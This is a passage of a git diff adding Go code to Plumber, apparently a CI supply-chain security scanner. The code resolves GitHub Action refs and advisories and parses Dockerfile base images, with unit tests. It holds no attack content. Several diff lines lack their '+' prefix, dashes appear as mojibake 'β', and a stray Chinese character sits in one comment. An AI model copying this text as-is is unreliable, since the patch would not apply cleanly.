+ lines, ok := scoreLetterAscii[letter]
+ if !ok {
+ lines = scoreLetterAscii["E"]
+ }
+ style := lipgloss.NewStyle().Foreground(scoreLetterLipglossColor(letter)).Bold(true)
+ joined := ""
+ for i, l := range lines {
+ if i > 0 {
+ joined += "\n"
+ }
+ joined += l
+ }
+ return style.Render(joined)
+}
diff --git a/collector/github_metadata.go b/collector/github_metadata.go
new file mode 100644
index 0000000..4dd55f6
--- /dev/null
+++ b/collector/github_metadata.go
@@ -0,0 +1,564 @@
+package collector
+
+import (
+ "encoding/json"
+ "fmt"
+ "os"
+ "regexp"
+ "strings"
+ "sync"
+
+ "github.com/cli/go-gh/v2/pkg/api"
+ version "github.com/hashicorp/go-version"
+)
+
// EnvDisableGitHubAPI, when set to a truthy value ("1" or "true"),
// forces the GitHub metadata client into degraded mode regardless of
// gh auth state. NewGitHubMetadataClient reads it at construction
// time; the test suite sets it to "1" to keep unit tests offline
// and fast.
const EnvDisableGitHubAPI = "PLUMBER_DISABLE_GITHUB_API"
+
// GitHubMetadata is the facts the API-backed policies need to know
// about a single `owner/repo@ref` action reference.
//
//   - RepoArchived: the GitHub repo hosting the action is archived.
//   - RefExists: the ref (tag / branch / commit SHA) resolves.
//   - RefKind: "tag", "branch", "commit", "unknown".
//   - TagSha: when RefKind=="tag", the commit SHA the tag
//     currently points at.
//   - LatestTag: the repo's newest release tag, "" when the
//     API returns no releases.
//   - LatestReleaseSha: the SHA that tag resolves to upstream.
//   - RefIsAmbiguous: the ref resolves as BOTH a tag and a branch
//     (ref-confusion).
//   - Advisories: security advisory identifiers from the
//     GitHub Advisory Database whose affected
//     version range covers this ref, if any.
//
// NOTE(review): resolveUncached never assigns RefKind "unknown" —
// unresolved refs keep RefKind == "". Confirm "unknown" is set
// elsewhere or drop it from the list above.
//
// Zero value (all fields empty / false) is explicitly "unknown" — it
// is also what the policies see when the API call failed. They
// should treat zero value as "I don't know" and stay silent.
type GitHubMetadata struct {
	RepoArchived     bool
	RefExists        bool
	RefKind          string
	TagSha           string
	LatestTag        string
	LatestReleaseSha string
	RefIsAmbiguous   bool
	Advisories       []string
}
+
// GitHubMetadataClient resolves `owner/repo@ref` references against
// the real GitHub REST API (via github.com/cli/go-gh which reuses
// the installed `gh` CLI's stored credentials) and caches every
// answer so the collector never hits the API twice for the same
// key. Safe for concurrent use: mu guards every cache map.
//
// When `gh` is not authenticated — or go-gh cannot find a token —
// the client operates in degraded mode: every lookup returns an
// empty GitHubMetadata and Available() returns false. Policies are
// expected to key their deny rules on the positive evidence the
// client surfaces, so the degraded-mode output is a zero-finding
// run rather than a crash.
type GitHubMetadataClient struct {
	rest *api.RESTClient
	mu   sync.Mutex
	// repoCache maps "owner/repo" to archived state; populated lazily.
	repoCache map[string]repoCacheEntry
	// refCache maps "owner/repo@ref" to the resolved metadata.
	refCache map[string]GitHubMetadata
	// latestCache maps "owner/repo" to its latest release tag.
	latestCache map[string]string
	// advisoryCache stores every advisory known for an action (id +
	// vulnerable version range), keyed by "owner/repo". Filtering to
	// advisories that actually cover the pinned ref happens on read.
	advisoryCache map[string][]advisoryInfo
	// sha2tagCache stores the tag list of a repo indexed by commit
	// SHA so a pinned SHA can be resolved back to its release tag.
	// nil entry means "tag list fetched and nothing matches".
	sha2tagCache map[string]map[string]string
	// disabled marks degraded mode (env kill switch or missing auth);
	// disableCause keeps the auth error for diagnostics, if any.
	disabled     bool
	disableCause error
}
+
// advisoryInfo is one vulnerability entry from the GitHub Advisory
// Database, narrowed to what the policy needs.
type advisoryInfo struct {
	GhsaID          string // GHSA identifier, e.g. "GHSA-xxxx-..."
	VulnerableRange string // affected version range, API syntax
	PatchedVersions string // first fixed version(s), "" when none
}
+
// repoCacheEntry caches the archived-state lookup of one repo.
// Populated by the repo lookup path (not shown in this chunk).
type repoCacheEntry struct {
	archived bool  // repo is archived upstream
	fetched  bool  // lookup已 performed — presumably guards re-fetch; confirm at use site
	err      error // error from the lookup, if any
}
+
+// NewGitHubMetadataClient builds a client using the gh-CLI auth
+// store. Returns a usable client even when authentication is
+// missing β see Available() to check. Honors the
+// PLUMBER_DISABLE_GITHUB_API env var which short-circuits the
+// client into degraded mode regardless of auth state.
+func NewGitHubMetadataClient() *GitHubMetadataClient {
+ c := &GitHubMetadataClient{
+ repoCache: map[string]repoCacheEntry{},
+ refCache: map[string]GitHubMetadata{},
+ latestCache: map[string]string{},
+ advisoryCache: map[string][]advisoryInfo{},
+ sha2tagCache: map[string]map[string]string{},
+ }
+ if v := os.Getenv(EnvDisableGitHubAPI); v == "1" || v == "true" {
+ c.disabled = true
+ return c
+ }
+ rest, err := api.DefaultRESTClient()
+ if err != nil {
+ c.disabled = true
+ c.disableCause = err
+ return c
+ }
+ c.rest = rest
+ return c
+}
+
// Available reports whether the client has a usable gh auth token
// (and was not disabled via PLUMBER_DISABLE_GITHUB_API). When false,
// every Resolve call returns the zero-valued "unknown" metadata.
func (c *GitHubMetadataClient) Available() bool {
	return !c.disabled
}
+
+// Resolve looks up "owner/repo@ref" and returns what the API told
+// us. Never returns an error β all failures degrade to "unknown"
+// (zero-valued GitHubMetadata). Repeated calls for the same key
+// return the cached value.
+func (c *GitHubMetadataClient) Resolve(ownerRepoRef string) GitHubMetadata {
+ if c.disabled {
+ return GitHubMetadata{}
+ }
+ owner, repo, ref, ok := splitActionRef(ownerRepoRef)
+ if !ok {
+ return GitHubMetadata{}
+ }
+ key := owner + "/" + repo + "@" + ref
+
+ c.mu.Lock()
+ if v, cached := c.refCache[key]; cached {
+ c.mu.Unlock()
+ return v
+ }
+ c.mu.Unlock()
+
+ meta := c.resolveUncached(owner, repo, ref)
+
+ c.mu.Lock()
+ c.refCache[key] = meta
+ c.mu.Unlock()
+ return meta
+}
+
+func (c *GitHubMetadataClient) resolveUncached(owner, repo, ref string) GitHubMetadata {
+ m := GitHubMetadata{}
+ m.RepoArchived = c.isRepoArchived(owner, repo)
+ m.LatestTag = c.latestReleaseTag(owner, repo)
+ if m.LatestTag != "" {
+ if sha, ok := c.resolveTag(owner, repo, m.LatestTag); ok {
+ m.LatestReleaseSha = sha
+ }
+ }
+ m.Advisories = c.advisoriesForRef(owner, repo, ref)
+
+ // Probe in order: tag β branch β commit. First hit wins, but
+ // when we match a tag we still check whether a same-named branch
+ // exists upstream β that cross-existence is what ref-confusion
+ // (ISSUE-113) is about.
+ if sha, ok := c.resolveTag(owner, repo, ref); ok {
+ m.RefKind = "tag"
+ m.TagSha = sha
+ m.RefExists = true
+ if c.branchExists(owner, repo, ref) {
+ m.RefIsAmbiguous = true
+ }
+ return m
+ }
+ if c.branchExists(owner, repo, ref) {
+ m.RefKind = "branch"
+ m.RefExists = true
+ return m
+ }
+ if c.commitExists(owner, repo, ref) {
+ m.RefKind = "commit"
+ m.RefExists = true
+ return m
+ }
+ // Unknown ref β keep RefKind empty, RefExists false.
+ return m
+}
+
+// advisoriesForRef returns the GHSA IDs whose vulnerable version
+// range actually covers the pinned ref. The raw advisory list is
+// fetched once per `owner/repo` and cached; only the per-ref
+// semver filtering runs here.
+//
+// When the ref cannot be resolved to a comparable version (unknown
+// tag, commit SHA that does not point at a release), the filter
+// degrades to "keep every advisory that references this package" --
+// better a false positive than a silent miss on a real CVE.
+func (c *GitHubMetadataClient) advisoriesForRef(owner, repo, ref string) []string {
+	infos := c.advisoriesForRepo(owner, repo)
+	if len(infos) == 0 {
+		return nil
+	}
+	refVersion := c.resolveRefToVersion(owner, repo, ref)
+	seen := make(map[string]struct{}, len(infos))
+	ids := []string{}
+	for _, info := range infos {
+		id := info.GhsaID
+		if id == "" {
+			continue
+		}
+		if _, dup := seen[id]; dup {
+			continue
+		}
+		// nil refVersion means "could not compare": fail open.
+		if refVersion != nil && !_versionInRange(refVersion, info.VulnerableRange) {
+			continue
+		}
+		seen[id] = struct{}{}
+		ids = append(ids, id)
+	}
+	return ids
+}
+
+// advisoriesForRepo fetches every GitHub Advisory Database entry
+// for an `owner/repo` action package, flattens each vulnerability
+// entry to an advisoryInfo, and caches the result so repeated
+// callers of the same action cost one API call.
+//
+// NOTE(review): a failed API call also caches the empty slice, so
+// a transient error negative-caches the repo for this client's
+// lifetime -- confirm that is the intended trade-off.
+func (c *GitHubMetadataClient) advisoriesForRepo(owner, repo string) []advisoryInfo {
+	key := owner + "/" + repo
+	c.mu.Lock()
+	if v, ok := c.advisoryCache[key]; ok {
+		c.mu.Unlock()
+		return v
+	}
+	c.mu.Unlock()
+
+	// Anonymous struct mirroring only the advisory fields consumed
+	// below.
+	var resp []struct {
+		GhsaID          string `json:"ghsa_id"`
+		Vulnerabilities []struct {
+			Package struct {
+				Name string `json:"name"`
+			} `json:"package"`
+			VulnerableVersionRange string `json:"vulnerable_version_range"`
+			PatchedVersions        string `json:"patched_versions"`
+		} `json:"vulnerabilities"`
+	}
+	out := []advisoryInfo{}
+	if err := c.rest.Get(fmt.Sprintf("advisories?ecosystem=actions&affects=%s/%s&per_page=100", owner, repo), &resp); err == nil {
+		want := key
+		for _, a := range resp {
+			for _, v := range a.Vulnerabilities {
+				// Advisories can list several packages; keep only
+				// entries for this exact action (case-insensitive).
+				if !strings.EqualFold(v.Package.Name, want) {
+					continue
+				}
+				out = append(out, advisoryInfo{
+					GhsaID:          a.GhsaID,
+					VulnerableRange: v.VulnerableVersionRange,
+					PatchedVersions: v.PatchedVersions,
+				})
+			}
+		}
+	}
+	c.mu.Lock()
+	c.advisoryCache[key] = out
+	c.mu.Unlock()
+	return out
+}
+
+// resolveRefToVersion turns the ref string into a comparable semver
+// value: if the ref is already a tag, strip the leading "v"; if
+// it is a 40-char commit SHA, look it up in the repo's tag list and
+// use the matching tag. Returns nil when the version cannot be
+// determined -- callers then fall back to "flag everything" so a
+// genuine CVE does not slip past because Plumber could not match
+// the SHA to a release.
+func (c *GitHubMetadataClient) resolveRefToVersion(owner, repo, ref string) *version.Version {
+	// Tag-shaped ref: parse directly.
+	if v, err := version.NewVersion(strings.TrimPrefix(ref, "v")); err == nil {
+		return v
+	}
+	// SHA-shaped ref: look up the tag pointing at that commit.
+	if _isCommitSha(ref) {
+		if tag := c.resolveCommitToTag(owner, repo, ref); tag != "" {
+			if v, err := version.NewVersion(strings.TrimPrefix(tag, "v")); err == nil {
+				return v
+			}
+		}
+	}
+	return nil
+}
+
+// _shaOnly matches a full-length lowercase hexadecimal git commit
+// SHA and nothing else.
+var _shaOnly = regexp.MustCompile(`^[0-9a-f]{40}$`)
+
+// _isCommitSha reports whether ref is exactly a 40-character
+// lowercase hex commit SHA.
+func _isCommitSha(ref string) bool {
+	if len(ref) != 40 {
+		return false
+	}
+	return _shaOnly.MatchString(ref)
+}
+
+// resolveCommitToTag returns the release tag pointing at the given
+// commit SHA, or "" when the SHA is not the head of any published
+// tag. The repo's full tag list is fetched once and cached.
+//
+// Two goroutines may both miss the cache and fetch concurrently;
+// that only costs a duplicate API call -- the last write wins and
+// the cache stays consistent.
+func (c *GitHubMetadataClient) resolveCommitToTag(owner, repo, sha string) string {
+	key := owner + "/" + repo
+	c.mu.Lock()
+	tags, cached := c.sha2tagCache[key]
+	c.mu.Unlock()
+	if !cached {
+		tags = c.fetchAllTags(owner, repo)
+		c.mu.Lock()
+		c.sha2tagCache[key] = tags
+		c.mu.Unlock()
+	}
+	// A missing key yields "", which is the "no tag" answer.
+	return tags[sha]
+}
+
+// fetchAllTags walks the paginated `/repos/{owner}/{repo}/tags`
+// endpoint and builds a SHA-to-tag-name map. Every tag is included
+// even when several tags share a SHA -- the last one fetched wins,
+// which is acceptable for the version-comparison use case.
+func (c *GitHubMetadataClient) fetchAllTags(owner, repo string) map[string]string {
+	const perPage = 100
+	const maxPages = 20 // hard cap: 2000 tags
+	tags := map[string]string{}
+	for page := 1; page <= maxPages; page++ {
+		var batch []struct {
+			Name   string `json:"name"`
+			Commit struct {
+				Sha string `json:"sha"`
+			} `json:"commit"`
+		}
+		endpoint := fmt.Sprintf("repos/%s/%s/tags?per_page=%d&page=%d", owner, repo, perPage, page)
+		if err := c.rest.Get(endpoint, &batch); err != nil || len(batch) == 0 {
+			break
+		}
+		for _, tag := range batch {
+			if tag.Name == "" || tag.Commit.Sha == "" {
+				continue
+			}
+			tags[tag.Commit.Sha] = tag.Name
+		}
+		// A short page means the listing is exhausted.
+		if len(batch) < perPage {
+			break
+		}
+	}
+	return tags
+}
+
+// _versionInRange parses the GitHub-advisory version range syntax
+// (`>= 3.26.11, <= 3.28.2`, `< 3.0.0`, `1.2.3`) with
+// hashicorp/go-version and reports whether v falls inside. Ranges
+// Plumber cannot parse -- including the empty string -- are treated
+// as "affects everything" so a parser failure never hides a real
+// CVE.
+func _versionInRange(v *version.Version, rangeExpr string) bool {
+	expr := strings.TrimSpace(rangeExpr)
+	if expr == "" {
+		return true
+	}
+	// Advisory ranges are comma-separated, which is exactly the
+	// multi-constraint syntax hashicorp/go-version parses natively.
+	if constraints, err := version.NewConstraint(expr); err == nil {
+		return constraints.Check(v)
+	}
+	// Unparseable range: fail open.
+	return true
+}
+
+// isRepoArchived reports the repo's `archived` flag from the
+// GitHub API, caching one entry per owner/repo. A failed fetch is
+// cached too (entry.err is recorded and archived stays false), so
+// an unreachable repo never costs more than one API call.
+func (c *GitHubMetadataClient) isRepoArchived(owner, repo string) bool {
+	c.mu.Lock()
+	cached, ok := c.repoCache[owner+"/"+repo]
+	c.mu.Unlock()
+	if ok && cached.fetched {
+		return cached.archived
+	}
+	var resp struct {
+		Archived bool `json:"archived"`
+	}
+	entry := repoCacheEntry{fetched: true}
+	if err := c.rest.Get(fmt.Sprintf("repos/%s/%s", owner, repo), &resp); err != nil {
+		entry.err = err
+	} else {
+		entry.archived = resp.Archived
+	}
+	c.mu.Lock()
+	c.repoCache[owner+"/"+repo] = entry
+	c.mu.Unlock()
+	return entry.archived
+}
+
+// latestReleaseTag returns the highest semver tag across a repo's
+// releases. `/releases/latest` alone is not reliable: many action
+// repos (github/codeql-action, actions/download-artifact) publish
+// out-of-band tags -- internal bundle snapshots like
+// `codeql-bundle-v2.25.2` or compatibility bridges like
+// `v3.1.0-node20` -- that rank as "latest" by date even though they
+// are not the user-facing release. The date-sorted order is also
+// misleading when maintainers backport a fix to an older line and
+// republish it *after* a newer major (e.g. v3.1.0 republished after
+// v8.0.1). ISSUE-111 is a semver-drift signal, so Plumber walks the
+// first few pages and picks the highest semver among non-draft,
+// non-prerelease tags whose semver itself has no prerelease segment.
+// The result (possibly "") is cached per owner/repo.
+func (c *GitHubMetadataClient) latestReleaseTag(owner, repo string) string {
+	key := owner + "/" + repo
+	c.mu.Lock()
+	if v, ok := c.latestCache[key]; ok {
+		c.mu.Unlock()
+		return v
+	}
+	c.mu.Unlock()
+
+	var best *version.Version
+	bestTag := ""
+	for page := 1; page <= 3; page++ {
+		var resp []struct {
+			TagName    string `json:"tag_name"`
+			Draft      bool   `json:"draft"`
+			Prerelease bool   `json:"prerelease"`
+		}
+		path := fmt.Sprintf("repos/%s/%s/releases?per_page=50&page=%d", owner, repo, page)
+		if err := c.rest.Get(path, &resp); err != nil || len(resp) == 0 {
+			break
+		}
+		for _, r := range resp {
+			if r.Draft || r.Prerelease {
+				continue
+			}
+			// Non-semver tag names are simply skipped.
+			parsed, err := version.NewVersion(strings.TrimPrefix(r.TagName, "v"))
+			if err != nil {
+				continue
+			}
+			// Reject compatibility bridges / betas whose semver
+			// carries a prerelease segment (e.g. `v3.1.0-node20`,
+			// `v1.0.0-beta`). GitHub sometimes publishes these with
+			// `prerelease: false`, so the API flag alone is not
+			// sufficient.
+			if parsed.Prerelease() != "" {
+				continue
+			}
+			if best == nil || parsed.GreaterThan(best) {
+				best = parsed
+				bestTag = r.TagName
+			}
+		}
+		if len(resp) < 50 {
+			break
+		}
+	}
+	c.mu.Lock()
+	c.latestCache[key] = bestTag
+	c.mu.Unlock()
+	return bestTag
+}
+
+// ResolveTagSha exposes the tag-to-SHA lookup publicly so the
+// ref-version-mismatch enrichment can query the commented tag
+// without going through the full Resolve() probe chain. Returns
+// "" when the client is disabled, the input is malformed, or the
+// tag cannot be resolved.
+func (c *GitHubMetadataClient) ResolveTagSha(ownerRepo, tag string) string {
+	if c.disabled || tag == "" {
+		return ""
+	}
+	parts := strings.SplitN(ownerRepo, "/", 2)
+	if len(parts) != 2 {
+		return ""
+	}
+	if sha, ok := c.resolveTag(parts[0], parts[1], tag); ok {
+		return sha
+	}
+	return ""
+}
+
+// resolveTag returns (sha, true) when ref is a tag on the repo and
+// we can read the SHA it points at. Returns ("", false) otherwise.
+func (c *GitHubMetadataClient) resolveTag(owner, repo, ref string) (string, bool) {
+	var resp json.RawMessage
+	err := c.rest.Get(fmt.Sprintf("repos/%s/%s/git/ref/tags/%s", owner, repo, ref), &resp)
+	if err != nil {
+		return "", false
+	}
+	// The reply is either a tag ref (object.type="commit") or a tag
+	// object (object.type="tag") -- in the latter case, the SHA
+	// points at the tag object, not the commit. Resolving the tag
+	// object to its target commit requires a second call.
+	var parsed struct {
+		Object struct {
+			Sha  string `json:"sha"`
+			Type string `json:"type"`
+			URL  string `json:"url"`
+		} `json:"object"`
+	}
+	if err := json.Unmarshal(resp, &parsed); err != nil {
+		return "", false
+	}
+	if parsed.Object.Type == "tag" {
+		var tagObj struct {
+			Object struct {
+				Sha string `json:"sha"`
+			} `json:"object"`
+		}
+		// git/tags/ resolves the annotated-tag object to the
+		// commit. If this secondary call fails we still return the
+		// tag-object SHA: the policy only needs "is this a tag" plus
+		// a stable identifier.
+		if err := c.rest.Get(fmt.Sprintf("repos/%s/%s/git/tags/%s", owner, repo, parsed.Object.Sha), &tagObj); err == nil {
+			return tagObj.Object.Sha, true
+		}
+	}
+	return parsed.Object.Sha, true
+}
+
+// branchExists reports whether ref names a branch on owner/repo.
+// Only the success/failure of the `/branches/{ref}` call matters;
+// the response body is discarded.
+func (c *GitHubMetadataClient) branchExists(owner, repo, ref string) bool {
+	var resp json.RawMessage
+	err := c.rest.Get(fmt.Sprintf("repos/%s/%s/branches/%s", owner, repo, ref), &resp)
+	return err == nil
+}
+
+// commitExists reports whether ref resolves as a commit on the
+// repo.
+func (c *GitHubMetadataClient) commitExists(owner, repo, ref string) bool {
+	// GitHub's commits endpoint accepts short SHAs too, but for
+	// impostor-commit we specifically want to know if a full 40-
+	// char SHA resolves. Narrower form than resolveTag -- we only
+	// need success vs failure.
+	var resp json.RawMessage
+	err := c.rest.Get(fmt.Sprintf("repos/%s/%s/commits/%s", owner, repo, ref), &resp)
+	return err == nil
+}
+
+// isZeroMetadata reports whether meta carries no content at all.
+// GitHubMetadata contains a slice field, which Go refuses to
+// compare with `==`, so the zero check is spelled out field by
+// field.
+func isZeroMetadata(meta GitHubMetadata) bool {
+	switch {
+	case meta.RepoArchived, meta.RefExists, meta.RefIsAmbiguous:
+		return false
+	case meta.RefKind != "", meta.TagSha != "", meta.LatestTag != "", meta.LatestReleaseSha != "":
+		return false
+	case len(meta.Advisories) > 0:
+		return false
+	default:
+		return true
+	}
+}
+
+// splitActionRef parses "owner/repo@ref" into its three parts. For
+// path-scoped composite actions ("owner/repo/path/to/action@ref")
+// the repo portion is the first path segment -- metadata lookups
+// never need the sub-path. Returns ok=false for forms Plumber
+// cannot check against the GitHub API (local "./" actions,
+// docker:// refs, bare strings without an "@ref").
+func splitActionRef(uses string) (owner, repo, ref string, ok bool) {
+	switch {
+	case strings.HasPrefix(uses, "./"), strings.HasPrefix(uses, "docker://"):
+		return "", "", "", false
+	}
+	at := strings.Index(uses, "@")
+	if at < 0 {
+		return "", "", "", false
+	}
+	head, tail := uses[:at], uses[at+1:]
+	segments := strings.SplitN(head, "/", 3)
+	if len(segments) < 2 {
+		return "", "", "", false
+	}
+	return segments[0], segments[1], tail, true
+}
diff --git a/collector/github_metadata_test.go b/collector/github_metadata_test.go
new file mode 100644
index 0000000..24df264
--- /dev/null
+++ b/collector/github_metadata_test.go
@@ -0,0 +1,41 @@
+package collector
+
+import (
+ "testing"
+
+ version "github.com/hashicorp/go-version"
+)
+
+// Test_versionInRange locks the ISSUE-114 range-filter semantics.
+// The scenario comes from a real-world false positive: the codeql-
+// action pinned at v4.35.1 was flagged for GHSA-vqf5-2xx6-9wfm
+// whose range covers `>= 3.26.11, <= 3.28.2` and `>= 2.26.11, <
+// 3.0.0`. A strict semver check keeps v4.35.1 out of either range
+// and silences the false positive.
+//
+// Table-driven: each case pins one boundary or one degradation
+// rule (empty / unparseable ranges fail open).
+func Test_versionInRange(t *testing.T) {
+	cases := []struct {
+		ver, rng string
+		want     bool
+	}{
+		{"3.28.2", ">= 3.26.11, <= 3.28.2", true},  // upper bound inclusive
+		{"3.28.3", ">= 3.26.11, <= 3.28.2", false}, // past upper bound
+		{"3.26.10", ">= 3.26.11, <= 3.28.2", false},
+		{"4.35.1", ">= 3.26.11, <= 3.28.2", false}, // real-world regression
+		{"2.30.0", ">= 2.26.11, < 3.0.0", true},
+		{"3.0.0", ">= 2.26.11, < 3.0.0", false},
+		// Empty / unparseable ranges degrade to "affects everything"
+		// so a broken advisory never silences a real CVE.
+		{"1.0.0", "", true},
+		{"1.0.0", "nonsense-range", true},
+	}
+	for _, c := range cases {
+		v, err := version.NewVersion(c.ver)
+		if err != nil {
+			t.Fatalf("version parse %q: %v", c.ver, err)
+		}
+		got := _versionInRange(v, c.rng)
+		if got != c.want {
+			t.Errorf("_versionInRange(%q, %q) = %v, want %v", c.ver, c.rng, got, c.want)
+		}
+	}
+}
diff --git a/collector/github_repo_artifacts.go b/collector/github_repo_artifacts.go
new file mode 100644
index 0000000..5a66882
--- /dev/null
+++ b/collector/github_repo_artifacts.go
@@ -0,0 +1,188 @@
+package collector
+
+import (
+ "bufio"
+ "fmt"
+ "os"
+ "path/filepath"
+ "regexp"
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/utils"
+)
+
+// scanRenovateConfig probes the usual Renovate config locations
+// (repo root, .github/, .gitlab/) and returns the first existing
+// regular file, or "" when none is present. A match here is enough
+// to consider "a dependency-update tool is configured" -- Plumber
+// never evaluates the Renovate config's correctness.
+func scanRenovateConfig(rootDir string) string {
+	relPaths := []string{
+		"renovate.json",
+		"renovate.json5",
+		".renovaterc",
+		".renovaterc.json",
+		".github/renovate.json",
+		".github/renovate.json5",
+		".gitlab/renovate.json",
+	}
+	for _, rel := range relPaths {
+		full := filepath.Join(rootDir, rel)
+		info, err := os.Stat(full)
+		if err == nil && !info.IsDir() {
+			return full
+		}
+	}
+	return ""
+}
+
+// scanSecurityPolicy returns the path of the first SECURITY.md-like
+// file found at the repository root or under .github/, docs/, or
+// .gitlab/. GitHub itself recognises root, .github/ and docs/ for
+// the disclosure-policy field on the repo UI.
+func scanSecurityPolicy(rootDir string) string {
+	// Common spellings, checked case-sensitively so exotic
+	// filesystems behave predictably.
+	fileNames := []string{
+		"SECURITY.md", "security.md", "Security.md",
+		"SECURITY.markdown", "security.markdown",
+		"SECURITY", "security",
+	}
+	searchDirs := []string{"", ".github", "docs", ".gitlab"}
+	for _, dir := range searchDirs {
+		for _, fn := range fileNames {
+			candidate := filepath.Join(rootDir, dir, fn)
+			if info, err := os.Stat(candidate); err == nil && !info.IsDir() {
+				return candidate
+			}
+		}
+	}
+	return ""
+}
+
+// scanDockerfiles discovers Dockerfile-shaped files at the
+// repository root and under common build / service directories
+// (up to two levels deep), parses each for FROM directives, and
+// returns the results in stable lexicographic path order. The
+// walk is deliberately shallow so vendored dependency trees are
+// never scanned; projects that keep Dockerfiles elsewhere can
+// still surface them via an explicit symlink at the root.
+func scanDockerfiles(rootDir string) []ir.Dockerfile {
+	found := map[string]struct{}{}
+	collectDockerfileCandidates(rootDir, 2, found)
+	ordered := make([]string, 0, len(found))
+	for p := range found {
+		ordered = append(ordered, p)
+	}
+	sort.Strings(ordered)
+	var dockerfiles []ir.Dockerfile
+	for _, p := range ordered {
+		parsed, err := parseDockerfileBases(p)
+		if err != nil {
+			// Unreadable candidate: skip it rather than abort the scan.
+			continue
+		}
+		parsed.Path = p
+		dockerfiles = append(dockerfiles, parsed)
+	}
+	return dockerfiles
+}
+
+// dockerfileNamePattern matches Dockerfile/Containerfile plus
+// suffixed variants (Dockerfile.dev, Containerfile-ci, ...),
+// case-insensitively.
+var dockerfileNamePattern = regexp.MustCompile(`(?i)^(Dockerfile|Containerfile)([.\-][A-Za-z0-9._-]+)?$`)
+
+// collectDockerfileCandidates recursively gathers the paths of
+// Dockerfile-shaped files under dir into out, descending at most
+// `depth` further directory levels. Unreadable directories are
+// silently skipped.
+func collectDockerfileCandidates(dir string, depth int, out map[string]struct{}) {
+	if depth < 0 {
+		return
+	}
+	entries, err := os.ReadDir(dir)
+	if err != nil {
+		return
+	}
+	for _, e := range entries {
+		name := e.Name()
+		if e.IsDir() {
+			// Never descend into the big drains on a typical repo.
+			switch name {
+			case ".git", "node_modules", "vendor", "testdata", ".terraform":
+				continue
+			}
+			// Hidden dirs beyond .github are skipped to avoid dotfiles
+			// that ship fixture Dockerfiles (e.g. .devcontainer is OK).
+			if strings.HasPrefix(name, ".") && name != ".github" && name != ".devcontainer" {
+				continue
+			}
+			collectDockerfileCandidates(filepath.Join(dir, name), depth-1, out)
+			continue
+		}
+		if dockerfileNamePattern.MatchString(name) {
+			out[filepath.Join(dir, name)] = struct{}{}
+		}
+	}
+}
+
+// Compiled once at package scope rather than per call:
+// parseDockerfileBases runs for every discovered Dockerfile, and
+// re-compiling three regexps on each invocation is pure waste
+// (regexp.MustCompile belongs at package level).
+var (
+	// dockerfileFromRe captures the image ref of a FROM line,
+	// tolerating an optional --platform flag and an AS alias.
+	dockerfileFromRe = regexp.MustCompile(`(?i)^\s*FROM\s+(--platform=\S+\s+)?(\S+)(\s+AS\s+\S+)?\s*$`)
+	// dockerfileArgRe captures `ARG NAME=default`; value-less ARGs
+	// are ignored because they contribute no substitutable default.
+	dockerfileArgRe = regexp.MustCompile(`(?i)^\s*ARG\s+([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.+?)\s*$`)
+	// dockerfileVarRe matches `$NAME` / `${NAME}` references.
+	dockerfileVarRe = regexp.MustCompile(`\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?`)
+)
+
+// parseDockerfileBases extracts every `FROM <image>[:tag][@digest]`
+// line from a Dockerfile, preserving the line number and digest-
+// pinning state. Multi-stage builds surface every stage (the
+// reviewer cares about each base, not just the final one).
+//
+// `ARG FOO=default` statements are collected and their default
+// values substituted into any `FROM` ref that references them --
+// idiomatic Dockerfiles pin the digest at the top (`ARG
+// GOLANG_IMAGE_TAG=1.26-bookworm@sha256:...`) and reuse the variable
+// across stages. Without substitution the parser would treat those
+// stages as unpinned and flag false ISSUE-107 findings.
+func parseDockerfileBases(path string) (ir.Dockerfile, error) {
+	f, err := os.Open(path) // #nosec G304
+	if err != nil {
+		return ir.Dockerfile{}, fmt.Errorf("open %s: %w", path, err)
+	}
+	defer func() { _ = f.Close() }()
+
+	var bases []ir.DockerfileBase
+	argVals := map[string]string{}
+	sc := bufio.NewScanner(f)
+	// Raise the scanner's max token size to 1 MiB so one
+	// pathologically long line does not abort the whole scan.
+	sc.Buffer(make([]byte, 0, 64*1024), 1024*1024)
+	lineNum := 0
+	for sc.Scan() {
+		lineNum++
+		line := strings.TrimRight(sc.Text(), " \t\r")
+		if m := dockerfileArgRe.FindStringSubmatch(line); m != nil {
+			// Strip surrounding quotes if any -- `ARG X="value"`.
+			val := strings.Trim(m[2], `"'`)
+			argVals[m[1]] = val
+			continue
+		}
+		m := dockerfileFromRe.FindStringSubmatch(line)
+		if m == nil {
+			continue
+		}
+		ref := m[2]
+		// Resolve `${VAR}` / `$VAR` references using the ARG defaults
+		// collected so far. Unknown variables stay as-is so the
+		// downstream check still flags a genuinely unpinned base.
+		resolved := dockerfileVarRe.ReplaceAllStringFunc(ref, func(match string) string {
+			name := strings.Trim(match, "${}")
+			if v, ok := argVals[name]; ok {
+				return v
+			}
+			return match
+		})
+		// A ref still starting with `$` is an unresolved variable
+		// reference with no ARG default; there is nothing meaningful
+		// to pin-check, so skip it.
+		if strings.HasPrefix(strings.ToLower(resolved), "$") {
+			continue
+		}
+		bases = append(bases, ir.DockerfileBase{
+			Image:          resolved,
+			Line:           lineNum,
+			PinnedByDigest: utils.HasDigestPin(resolved),
+		})
+	}
+	if err := sc.Err(); err != nil {
+		return ir.Dockerfile{}, fmt.Errorf("scan %s: %w", path, err)
+	}
+	return ir.Dockerfile{Path: path, Bases: bases}, nil
+}
diff --git a/collector/github_repo_artifacts_test.go b/collector/github_repo_artifacts_test.go
new file mode 100644
index 0000000..e37791f
--- /dev/null
+++ b/collector/github_repo_artifacts_test.go
@@ -0,0 +1,39 @@
+package collector
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+)
+
+// TestScanDockerfilesSortedByPath locks the deterministic output
+// contract: scanDockerfiles must return results in lexicographic
+// path order regardless of directory-listing order.
+func TestScanDockerfilesSortedByPath(t *testing.T) {
+	root := t.TempDir()
+	if err := os.Mkdir(filepath.Join(root, "z"), 0o755); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Mkdir(filepath.Join(root, "a"), 0o755); err != nil {
+		t.Fatal(err)
+	}
+	pathZ := filepath.Join(root, "z", "Dockerfile")
+	pathA := filepath.Join(root, "a", "Dockerfile")
+	mustWriteFile(t, pathZ, "FROM alpine:3\n")
+	mustWriteFile(t, pathA, "FROM alpine:3\n")
+
+	dfs := scanDockerfiles(root)
+	if len(dfs) != 2 {
+		t.Fatalf("expected 2 dockerfiles, got %d", len(dfs))
+	}
+	if dfs[0].Path >= dfs[1].Path {
